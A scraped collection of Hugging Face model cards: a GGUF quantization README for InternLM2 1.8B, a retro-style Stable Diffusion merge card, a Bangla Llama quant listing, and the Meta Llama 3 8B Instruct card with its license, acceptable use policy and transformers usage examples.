You can download the individual files from the Files & versions section. Here is a list of the different versions we provide. For more info checkout [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):
| Quant type | Description |
|------------|--------------------------------------------------------------------------------------------|
| Q5_K_M | High quality, recommended. |
| Q5_K_S | High quality, recommended. |
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
| Q3_K_M | Even lower quality. |
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| Q3_K_S | Low quality, not recommended. |
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| Q2_K | Very low quality but surprisingly usable. |
## How to download GGUF files ?
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
* LM Studio
* LoLLMS Web UI
* Faraday.dev
- **Option A** - Downloading in `text-generation-webui`:
- **Step 1**: Under Download Model, you can enter the model repo: internlm-internlm2-1_8b-GGUF-smashed and below it, a specific filename to download, such as: internlm2-1_8b.IQ3_M.gguf.
- **Step 2**: Then click Download.
- **Option B** - Downloading on the command line (including multiple files at once):
- **Step 1**: We recommend using the `huggingface-hub` Python library:
```shell
pip3 install huggingface-hub
```
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed internlm2-1_8b.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage (click to read)</summary>
Alternatively, you can also download multiple files at once with a pattern:
```shell
huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
```shell
pip3 install hf_transfer
```
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
```shell
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download internlm-internlm2-1_8b-GGUF-smashed internlm2-1_8b.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->
<!-- README_GGUF.md-how-to-run start -->
## How to run model in GGUF format?
- **Option A** - Introductory example with `llama.cpp` command
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
```shell
./main -ngl 35 -m internlm2-1_8b.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p "<s>[INST] {prompt} [/INST]"
```
Change `-ngl 35` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
- **Option B** - Running in `text-generation-webui`
Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).
- **Option C** - Running from Python code
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.
### How to load this model in Python code, using llama-cpp-python
For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).
#### First install the package
Run one of the following commands, according to your system:
```shell
# Base llama-cpp-python with no GPU acceleration
pip install llama-cpp-python
# With NVidia CUDA acceleration
CMAKE_ARGS="-DLLAMA_CUBLAS=on" pip install llama-cpp-python
# Or with OpenBLAS acceleration
CMAKE_ARGS="-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS" pip install llama-cpp-python
# Or with CLBLast acceleration
CMAKE_ARGS="-DLLAMA_CLBLAST=on" pip install llama-cpp-python
# Or with AMD ROCm GPU acceleration (Linux only)
CMAKE_ARGS="-DLLAMA_HIPBLAS=on" pip install llama-cpp-python
# Or with Metal GPU acceleration for macOS systems only
CMAKE_ARGS="-DLLAMA_METAL=on" pip install llama-cpp-python
# On Windows, to set the CMAKE_ARGS variable in PowerShell, follow this format; e.g. for NVidia CUDA:
$env:CMAKE_ARGS = "-DLLAMA_CUBLAS=on"
pip install llama-cpp-python
```
#### Simple llama-cpp-python example code
```python
from llama_cpp import Llama
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = Llama(
model_path="./internlm2-1_8b.IQ3_M.gguf", # Download the model file first
n_ctx=32768, # The max sequence length to use - note that longer sequence lengths require much more resources
n_threads=8, # The number of CPU threads to use, tailor to your system and the resulting performance
n_gpu_layers=35 # The number of layers to offload to GPU, if you have GPU acceleration available
)
# Simple inference example
output = llm(
"<s>[INST] {{prompt}} [/INST]", # Prompt
max_tokens=512, # Generate up to 512 tokens
stop=["</s>"], # Example stop token - not necessarily correct for this specific model! Please check before using.
echo=True # Whether to echo the prompt
)
# Chat Completion API
llm = Llama(model_path="./internlm2-1_8b.IQ3_M.gguf", chat_format="llama-2") # Set chat_format according to the model you are using
llm.create_chat_completion(
messages = [
{{"role": "system", "content": "You are a story writing assistant."}},
{{
"role": "user",
"content": "Write a story about llamas."
}}
]
)
```
- **Option D** - Running with LangChain
Here are guides on using llama-cpp-python and ctransformers with LangChain; a short sketch follows the links below:
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
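As a brief illustration (assuming `langchain-community` and `llama-cpp-python` are installed), wiring one of the quants from this repo into LangChain might look like:
```python
# Illustrative sketch: using a GGUF quant from this repo through LangChain's LlamaCpp wrapper.
from langchain_community.llms import LlamaCpp

llm = LlamaCpp(
    model_path="./internlm2-1_8b.IQ3_M.gguf",  # path to the downloaded quant
    n_ctx=32768,
    n_gpu_layers=35,  # set to 0 if no GPU acceleration is available
)
print(llm.invoke("Name three landmarks in Paris."))
```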
## Configurations
The configuration info are in `smash_config.json`.
## Credits & License
The license of the smashed model follows the license of the original model. Please check the license of the original model before using this model which provided the base model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on Pypi.
## Want to compress other models?
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai). |
Yntec/RetroArt | Yntec | "2024-05-13T12:34:32Z" | 3,648 | 1 | diffusers | [
"diffusers",
"safetensors",
"Retro",
"Art",
"Vintage",
"Elldreth",
"DucHaiten",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2024-05-13T10:55:09Z" | ---
license: creativeml-openrail-m
library_name: diffusers
pipeline_tag: text-to-image
tags:
- Retro
- Art
- Vintage
- Elldreth
- DucHaiten
- stable-diffusion
- stable-diffusion-diffusers
- diffusers
- text-to-image
---
# Retro Art
Samples and prompts:

(Click for larger)
Top left: Girls portrait. worn out washed Retro Stock colors Closeup detailed eyes faces movie TRAILER TV. Santa clause and daughters enjoying tacos with enchiladas. sitting with a pretty cute little girl, Art Christmas Theme by Gil_Elvgren and Haddon_Sundblom. Posing
Top right: 60s NEON COLORS movie still, pretty school woman Cinematic with cleavage hugging handsome man, classroom, Uniforms, blackboard. Pinup. He wears a backpack, bokeh
Bottom left: pretty CUTE little girl sitting in toy room illustration, 1941 ponytail, HOLDING Sega Nintendo CONTROLLER, PC MONITOR screen, Magazine ad, Iconic. beautiful detailed, unreal 5, daz, hyperrealistic, octane render, Painterly soft brush, shy modest pleasing palette, textured, detailed, flawless, perfect, mural - sized chibi character design key visual symmetrical headshot portrait by yoshitomo nara
Bottom right (prompt by digiplay): 1girl,night, waterfall, white wavy hair Angel 22y.o, (realistic:2),Mucha,4k,rabbits and birds, close up,
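To try these prompts locally, the merged checkpoint can be loaded with `diffusers` (a minimal sketch, not from the original pages; sampler settings are illustrative):
```python
# Minimal sketch: text-to-image with the merged checkpoint via diffusers.
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained("Yntec/RetroArt", torch_dtype=torch.float16)
pipe = pipe.to("cuda")

prompt = "pretty cute little girl sitting in a toy room, 1940s illustration, retro magazine ad"
image = pipe(prompt, num_inference_steps=30, guidance_scale=7.5).images[0]
image.save("retroart_sample.png")
```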
Original pages:
https://huggingface.co/DucHaiten/DucHaitenAIart (beta-v6.0.ckpt)
https://huggingface.co/LibreSD/Elldreth (Elldreth's_Retro_Mix.safetensors)
# Recipe:
- SuperMerger Weight sum MBW 1,1,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,0,0,0
Model A: elldrethsRetroMix (https://huggingface.co/Yntec/ElldrethsRetroMix/resolve/main/elldrethsRetroMix.safetensors)
Model B: DucHaitenAIart-beta (https://huggingface.co/Yntec/DucHaitenAIart-beta/resolve/main/beta-v6.0-no-emaVAE.safetensors)
Output: RetroArt |
PassionFriend/5FeuyzGi3S8EwWGmvmeGoNG3nTgJppgaT9XnYaKExR5ZtUuq_vgg | PassionFriend | "2024-03-01T06:36:28Z" | 3,646 | 0 | keras | [
"keras",
"region:us"
] | null | "2024-02-05T18:27:44Z" | Entry not found |
mradermacher/bangla-llama-7b-instruct-v0.1-GGUF | mradermacher | "2024-06-09T15:14:36Z" | 3,642 | 0 | transformers | [
"transformers",
"gguf",
"bn",
"en",
"base_model:BanglaLLM/bangla-llama-7b-instruct-v0.1",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-09T14:50:06Z" | ---
base_model: BanglaLLM/bangla-llama-7b-instruct-v0.1
language:
- bn
- en
library_name: transformers
license: llama2
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/BanglaLLM/bangla-llama-7b-instruct-v0.1
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q2_K.gguf) | Q2_K | 2.7 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_XS.gguf) | IQ3_XS | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_S.gguf) | IQ3_S | 3.1 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_S.gguf) | Q3_K_S | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ3_M.gguf) | IQ3_M | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_M.gguf) | Q3_K_M | 3.5 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q3_K_L.gguf) | Q3_K_L | 3.8 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.IQ4_XS.gguf) | IQ4_XS | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q4_K_S.gguf) | Q4_K_S | 4.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q4_K_M.gguf) | Q4_K_M | 4.3 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q5_K_S.gguf) | Q5_K_S | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q5_K_M.gguf) | Q5_K_M | 5.0 | |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q6_K.gguf) | Q6_K | 5.8 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.Q8_0.gguf) | Q8_0 | 7.4 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/bangla-llama-7b-instruct-v0.1-GGUF/resolve/main/bangla-llama-7b-instruct-v0.1.f16.gguf) | f16 | 13.9 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
NurtureAI/Meta-Llama-3-8B-Instruct-32k | NurtureAI | "2024-04-22T18:52:28Z" | 3,640 | 7 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"facebook",
"meta",
"pytorch",
"llama-3",
"conversational",
"en",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-04-22T18:42:12Z" | ---
language:
- en
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
license: other
license_name: llama3
license_link: LICENSE
extra_gated_prompt: >-
### META LLAMA 3 COMMUNITY LICENSE AGREEMENT
Meta Llama 3 Version Release Date: April 18, 2024
"Agreement" means the terms and conditions for use, reproduction, distribution and modification of the
Llama Materials set forth herein.
"Documentation" means the specifications, manuals and documentation accompanying Meta Llama 3
distributed by Meta at https://llama.meta.com/get-started/.
"Licensee" or "you" means you, or your employer or any other person or entity (if you are entering into
this Agreement on such person or entity’s behalf), of the age required under applicable laws, rules or
regulations to provide legal consent and that has legal authority to bind your employer or such other
person or entity if you are entering in this Agreement on their behalf.
"Meta Llama 3" means the foundational large language models and software and algorithms, including
machine-learning model code, trained model weights, inference-enabling code, training-enabling code,
fine-tuning enabling code and other elements of the foregoing distributed by Meta at
https://llama.meta.com/llama-downloads.
"Llama Materials" means, collectively, Meta’s proprietary Meta Llama 3 and Documentation (and any
portion thereof) made available under this Agreement.
"Meta" or "we" means Meta Platforms Ireland Limited (if you are located in or, if you are an entity, your
principal place of business is in the EEA or Switzerland) and Meta Platforms, Inc. (if you are located
outside of the EEA or Switzerland).
1. License Rights and Redistribution.
a. Grant of Rights. You are granted a non-exclusive, worldwide, non-transferable and royalty-free
limited license under Meta’s intellectual property or other rights owned by Meta embodied in the Llama
Materials to use, reproduce, distribute, copy, create derivative works of, and make modifications to the
Llama Materials.
b. Redistribution and Use.
i. If you distribute or make available the Llama Materials (or any derivative works
thereof), or a product or service that uses any of them, including another AI model, you shall (A) provide
a copy of this Agreement with any such Llama Materials; and (B) prominently display “Built with Meta
Llama 3” on a related website, user interface, blogpost, about page, or product documentation. If you
use the Llama Materials to create, train, fine tune, or otherwise improve an AI model, which is
distributed or made available, you shall also include “Llama 3” at the beginning of any such AI model
name.
ii. If you receive Llama Materials, or any derivative works thereof, from a Licensee as part
of an integrated end user product, then Section 2 of this Agreement will not apply to you.
iii. You must retain in all copies of the Llama Materials that you distribute the following
attribution notice within a “Notice” text file distributed as a part of such copies: “Meta Llama 3 is
licensed under the Meta Llama 3 Community License, Copyright © Meta Platforms, Inc. All Rights
Reserved.”
iv. Your use of the Llama Materials must comply with applicable laws and regulations
(including trade compliance laws and regulations) and adhere to the Acceptable Use Policy for the Llama
Materials (available at https://llama.meta.com/llama3/use-policy), which is hereby incorporated by
reference into this Agreement.
v. You will not use the Llama Materials or any output or results of the Llama Materials to
improve any other large language model (excluding Meta Llama 3 or derivative works thereof).
2. Additional Commercial Terms. If, on the Meta Llama 3 version release date, the monthly active users
of the products or services made available by or for Licensee, or Licensee’s affiliates, is greater than 700
million monthly active users in the preceding calendar month, you must request a license from Meta,
which Meta may grant to you in its sole discretion, and you are not authorized to exercise any of the
rights under this Agreement unless or until Meta otherwise expressly grants you such rights.
3. Disclaimer of Warranty. UNLESS REQUIRED BY APPLICABLE LAW, THE LLAMA MATERIALS AND ANY
OUTPUT AND RESULTS THEREFROM ARE PROVIDED ON AN “AS IS” BASIS, WITHOUT WARRANTIES OF
ANY KIND, AND META DISCLAIMS ALL WARRANTIES OF ANY KIND, BOTH EXPRESS AND IMPLIED,
INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OF TITLE, NON-INFRINGEMENT,
MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. YOU ARE SOLELY RESPONSIBLE FOR
DETERMINING THE APPROPRIATENESS OF USING OR REDISTRIBUTING THE LLAMA MATERIALS AND
ASSUME ANY RISKS ASSOCIATED WITH YOUR USE OF THE LLAMA MATERIALS AND ANY OUTPUT AND
RESULTS.
4. Limitation of Liability. IN NO EVENT WILL META OR ITS AFFILIATES BE LIABLE UNDER ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, TORT, NEGLIGENCE, PRODUCTS LIABILITY, OR OTHERWISE, ARISING
OUT OF THIS AGREEMENT, FOR ANY LOST PROFITS OR ANY INDIRECT, SPECIAL, CONSEQUENTIAL,
INCIDENTAL, EXEMPLARY OR PUNITIVE DAMAGES, EVEN IF META OR ITS AFFILIATES HAVE BEEN ADVISED
OF THE POSSIBILITY OF ANY OF THE FOREGOING.
5. Intellectual Property.
a. No trademark licenses are granted under this Agreement, and in connection with the Llama
Materials, neither Meta nor Licensee may use any name or mark owned by or associated with the other
or any of its affiliates, except as required for reasonable and customary use in describing and
redistributing the Llama Materials or as set forth in this Section 5(a). Meta hereby grants you a license to
use “Llama 3” (the “Mark”) solely as required to comply with the last sentence of Section 1.b.i. You will
comply with Meta’s brand guidelines (currently accessible at
https://about.meta.com/brand/resources/meta/company-brand/ ). All goodwill arising out of your use
of the Mark will inure to the benefit of Meta.
b. Subject to Meta’s ownership of Llama Materials and derivatives made by or for Meta, with
respect to any derivative works and modifications of the Llama Materials that are made by you, as
between you and Meta, you are and will be the owner of such derivative works and modifications.
c. If you institute litigation or other proceedings against Meta or any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Llama Materials or Meta Llama 3 outputs or
results, or any portion of any of the foregoing, constitutes infringement of intellectual property or other
rights owned or licensable by you, then any licenses granted to you under this Agreement shall
terminate as of the date such litigation or claim is filed or instituted. You will indemnify and hold
harmless Meta from and against any claim by any third party arising out of or related to your use or
distribution of the Llama Materials.
6. Term and Termination. The term of this Agreement will commence upon your acceptance of this
Agreement or access to the Llama Materials and will continue in full force and effect until terminated in
accordance with the terms and conditions herein. Meta may terminate this Agreement if you are in
breach of any term or condition of this Agreement. Upon termination of this Agreement, you shall delete
and cease use of the Llama Materials. Sections 3, 4 and 7 shall survive the termination of this
Agreement.
7. Governing Law and Jurisdiction. This Agreement will be governed and construed under the laws of
the State of California without regard to choice of law principles, and the UN Convention on Contracts
for the International Sale of Goods does not apply to this Agreement. The courts of California shall have
exclusive jurisdiction of any dispute arising out of this Agreement.
### Meta Llama 3 Acceptable Use Policy
Meta is committed to promoting safe and fair use of its tools and features, including Meta Llama 3. If you
access or use Meta Llama 3, you agree to this Acceptable Use Policy (“Policy”). The most recent copy of
this policy can be found at [https://llama.meta.com/llama3/use-policy](https://llama.meta.com/llama3/use-policy)
#### Prohibited Uses
We want everyone to use Meta Llama 3 safely and responsibly. You agree you will not use, or allow
others to use, Meta Llama 3 to:
1. Violate the law or others’ rights, including to:
1. Engage in, promote, generate, contribute to, encourage, plan, incite, or further illegal or unlawful activity or content, such as:
1. Violence or terrorism
2. Exploitation or harm to children, including the solicitation, creation, acquisition, or dissemination of child exploitative content or failure to report Child Sexual Abuse Material
3. Human trafficking, exploitation, and sexual violence
4. The illegal distribution of information or materials to minors, including obscene materials, or failure to employ legally required age-gating in connection with such information or materials.
5. Sexual solicitation
6. Any other criminal activity
2. Engage in, promote, incite, or facilitate the harassment, abuse, threatening, or bullying of individuals or groups of individuals
3. Engage in, promote, incite, or facilitate discrimination or other unlawful or harmful conduct in the provision of employment, employment benefits, credit, housing, other economic benefits, or other essential goods and services
4. Engage in the unauthorized or unlicensed practice of any profession including, but not limited to, financial, legal, medical/health, or related professional practices
5. Collect, process, disclose, generate, or infer health, demographic, or other sensitive personal or private information about individuals without rights and consents required by applicable laws
6. Engage in or facilitate any action or generate any content that infringes, misappropriates, or otherwise violates any third-party rights, including the outputs or results of any products or services using the Llama Materials
7. Create, generate, or facilitate the creation of malicious code, malware, computer viruses or do anything else that could disable, overburden, interfere with or impair the proper working, integrity, operation or appearance of a website or computer system
2. Engage in, promote, incite, facilitate, or assist in the planning or development of activities that present a risk of death or bodily harm to individuals, including use of Meta Llama 3 related to the following:
1. Military, warfare, nuclear industries or applications, espionage, use for materials or activities that are subject to the International Traffic Arms Regulations (ITAR) maintained by the United States Department of State
2. Guns and illegal weapons (including weapon development)
3. Illegal drugs and regulated/controlled substances
4. Operation of critical infrastructure, transportation technologies, or heavy machinery
5. Self-harm or harm to others, including suicide, cutting, and eating disorders
6. Any content intended to incite or promote violence, abuse, or any infliction of bodily harm to an individual
3. Intentionally deceive or mislead others, including use of Meta Llama 3 related to the following:
1. Generating, promoting, or furthering fraud or the creation or promotion of disinformation
2. Generating, promoting, or furthering defamatory content, including the creation of defamatory statements, images, or other content
3. Generating, promoting, or further distributing spam
4. Impersonating another individual without consent, authorization, or legal right
5. Representing that the use of Meta Llama 3 or outputs are human-generated
6. Generating or facilitating false online engagement, including fake reviews and other means of fake online engagement
4. Fail to appropriately disclose to end users any known dangers of your AI system
Please report any violation of this Policy, software “bug,” or other problems that could lead to a violation
of this Policy through one of the following means:
* Reporting issues with the model: [https://github.com/meta-llama/llama3](https://github.com/meta-llama/llama3)
* Reporting risky content generated by the model:
developers.facebook.com/llama_output_feedback
* Reporting bugs and security concerns: facebook.com/whitehat/info
* Reporting violations of the Acceptable Use Policy or unlicensed uses of Meta Llama 3: [email protected]
extra_gated_fields:
First Name: text
Last Name: text
Date of birth: date_picker
Country: country
Affiliation: text
geo: ip_location
By clicking Submit below I accept the terms of the license and acknowledge that the information I provide will be collected stored processed and shared in accordance with the Meta Privacy Policy: checkbox
extra_gated_description: The information you provide will be collected, stored, processed and shared in accordance with the [Meta Privacy Policy](https://www.facebook.com/privacy/policy/).
extra_gated_button_content: Submit
---
## Model Details
Meta developed and released the Meta Llama 3 family of large language models (LLMs), a collection of pretrained and instruction tuned generative text models in 8 and 70B sizes. The Llama 3 instruction tuned models are optimized for dialogue use cases and outperform many of the available open source chat models on common industry benchmarks. Further, in developing these models, we took great care to optimize helpfulness and safety.
**Model developers** Meta
**Variations** Llama 3 comes in two sizes — 8B and 70B parameters — in pre-trained and instruction tuned variants.
**Input** Models input text only.
**Output** Models generate text and code only.
**Model Architecture** Llama 3 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align with human preferences for helpfulness and safety.
<table>
<tr>
<td>
</td>
<td><strong>Training Data</strong>
</td>
<td><strong>Params</strong>
</td>
<td><strong>Context length</strong>
</td>
<td><strong>GQA</strong>
</td>
<td><strong>Token count</strong>
</td>
<td><strong>Knowledge cutoff</strong>
</td>
</tr>
<tr>
<td rowspan="2" >Llama 3
</td>
<td rowspan="2" >A new mix of publicly available online data.
</td>
<td>8B
</td>
<td>8k
</td>
<td>Yes
</td>
<td rowspan="2" >15T+
</td>
<td>March, 2023
</td>
</tr>
<tr>
<td>70B
</td>
<td>8k
</td>
<td>Yes
</td>
<td>December, 2023
</td>
</tr>
</table>
**Llama 3 family of models**. Token counts refer to pretraining data only. Both the 8 and 70B versions use Grouped-Query Attention (GQA) for improved inference scalability.
**Model Release Date** April 18, 2024.
**Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback.
**License** A custom commercial license is available at: [https://llama.meta.com/llama3/license](https://llama.meta.com/llama3/license)
**Where to send questions or comments about the model** Instructions on how to provide feedback or comments on the model can be found in the model [README](https://github.com/meta-llama/llama3). For more technical information about generation parameters and recipes for how to use Llama 3 in applications, please go [here](https://github.com/meta-llama/llama-recipes).
## Intended Use
**Intended Use Cases** Llama 3 is intended for commercial and research use in English. Instruction tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks.
**Out-of-scope** Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in any other way that is prohibited by the Acceptable Use Policy and Llama 3 Community License. Use in languages other than English**.
**Note: Developers may fine-tune Llama 3 models for languages beyond English provided they comply with the Llama 3 Community License and the Acceptable Use Policy.
## How to use
This repository contains two versions of Meta-Llama-3-8B-Instruct, for use with transformers and with the original `llama3` codebase.
### Use with transformers
You can run conversational inference using the Transformers pipeline abstraction, or by leveraging the Auto classes with the `generate()` function. Let's see examples of both.
#### Transformers pipeline
```python
import transformers
import torch
model_id = "meta-llama/Meta-Llama-3-8B-Instruct"
pipeline = transformers.pipeline(
"text-generation",
model=model_id,
model_kwargs={"torch_dtype": torch.bfloat16},
device="auto",
)
messages = [
{"role": "system", "content": "You are a pirate chatbot who always responds in pirate speak!"},
{"role": "user", "content": "Who are you?"},
]
prompt = pipeline.tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
terminators = [
pipeline.tokenizer.eos_token_id,
pipeline.tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = pipeline(
prompt,
max_new_tokens=256,
eos_token_id=terminators,
do_sample=True,
temperature=0.6,
top_p=0.9,
)
print(outputs[0]["generated_text"][len(prompt):])
```
#### Transformers AutoModelForCausalLM
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_id = "meta-llama/Meta-Llama-3-8B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
model_id,
torch_dtype=torch.bfloat16,
device_map="auto",
)
messages = [
{"role": "system", "content": "You are a pirate chatbot who always responds in pirate speak!"},
{"role": "user", "content": "Who are you?"},
]
input_ids = tokenizer.apply_chat_template(
messages,
add_generation_prompt=True,
return_tensors="pt"
).to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(
input_ids,
max_new_tokens=256,
eos_token_id=terminators,
do_sample=True,
temperature=0.6,
top_p=0.9,
)
response = outputs[0][input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
### Use with `llama3`
Please follow the instructions in the [repository](https://github.com/meta-llama/llama3).
To download Original checkpoints, see the example command below leveraging `huggingface-cli`:
```
huggingface-cli download meta-llama/Meta-Llama-3-8B-Instruct --include "original/*" --local-dir Meta-Llama-3-8B-Instruct
```
For Hugging Face support, we recommend using transformers or TGI, but a similar command works.
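If you prefer to stay in Python, roughly the same download can be done with `huggingface_hub`. This is a minimal sketch rather than part of the original instructions; it assumes `huggingface_hub` is installed and that you are authenticated with access to the gated repository.
```python
from huggingface_hub import snapshot_download

# Mirror the CLI command above: fetch only the original (consolidated) checkpoint files.
snapshot_download(
    repo_id="meta-llama/Meta-Llama-3-8B-Instruct",
    allow_patterns=["original/*"],
    local_dir="Meta-Llama-3-8B-Instruct",
)
```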
## Hardware and Software
